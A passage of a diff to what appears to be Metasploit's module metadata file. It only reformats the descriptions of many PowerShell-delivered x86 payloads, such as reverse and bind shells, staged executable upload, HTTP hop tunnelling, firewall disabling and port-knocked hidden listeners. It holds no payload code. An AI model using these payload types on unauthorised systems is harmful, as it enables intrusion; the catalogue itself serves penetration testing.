    ],
@@ -182624,7 +183470,7 @@
      "ege <egebalci@pm.me>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182662,7 +183508,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182700,7 +183546,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -182739,7 +183585,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182779,7 +183625,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182819,7 +183665,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182856,7 +183702,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -182891,7 +183737,7 @@
      "Spencer McIntyre",
      "bwatters-r7"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Open a socket and report UUID when a connection is received (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nOpen a socket and report UUID when a connection is received (Windows x86)",
    "references": [

    ],
@@ -182926,7 +183772,7 @@
      "Spencer McIntyre",
      "bwatters-r7"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to attacker and report UUID (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x86)",
    "references": [

    ],
@@ -183079,7 +183925,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -183118,7 +183964,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -183156,7 +184002,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -183195,7 +184041,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -183232,7 +184078,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -183269,7 +184115,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -183307,7 +184153,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -183347,7 +184193,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -183385,7 +184231,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -183422,7 +184268,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -183460,7 +184306,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -183497,7 +184343,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -183533,7 +184379,7 @@
      "spoonm <spoonm@no$email.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183571,7 +184417,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183609,7 +184455,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -183648,7 +184494,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183688,7 +184534,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183728,7 +184574,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -183766,7 +184612,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -183803,7 +184649,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -183839,7 +184685,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection and spawn a command shell",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell",
    "references": [

    ],
@@ -183874,7 +184720,7 @@
      "Spencer McIntyre",
      "Lin0xx <lin0xx@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Disable the Windows ICF, then listen for a connection and spawn a command shell",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nDisable the Windows ICF, then listen for a connection and spawn a command shell",
    "references": [

    ],
@@ -183911,7 +184757,7 @@
      "sd",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from certain IP and spawn a command shell.\n                          The shellcode will reply with a RST packet if the connections is not\n                          coming from the IP defined in AHOST. This way the port will appear\n                          as \"closed\" helping us to hide the shellcode.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.",
    "references": [

    ],
@@ -183947,7 +184793,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to attacker and spawn a command shell",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell",
    "references": [

    ],
@@ -184021,7 +184867,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -184060,7 +184906,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -184098,7 +184944,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -184137,7 +184983,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -184174,7 +185020,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -184210,7 +185056,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -184248,7 +185094,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -184288,7 +185134,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -184326,7 +185172,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -184363,7 +185209,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -184401,7 +185247,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -184437,7 +185283,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -184474,7 +185320,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184512,7 +185358,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184550,7 +185396,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -184589,7 +185435,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184629,7 +185475,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184669,7 +185515,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184707,7 +185553,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -184744,7 +185590,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -184782,7 +185628,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184821,7 +185667,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184859,7 +185705,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184898,7 +185744,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184935,7 +185781,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184972,7 +185818,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185010,7 +185856,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185050,7 +185896,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185088,7 +185934,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185125,7 +185971,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185164,7 +186010,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185201,7 +186047,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185238,7 +186084,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185276,7 +186122,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185313,7 +186159,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185350,7 +186196,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185388,7 +186234,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185426,7 +186272,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185465,7 +186311,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185505,7 +186351,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185545,7 +186391,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185583,7 +186429,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185621,7 +186467,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows winhttp)",
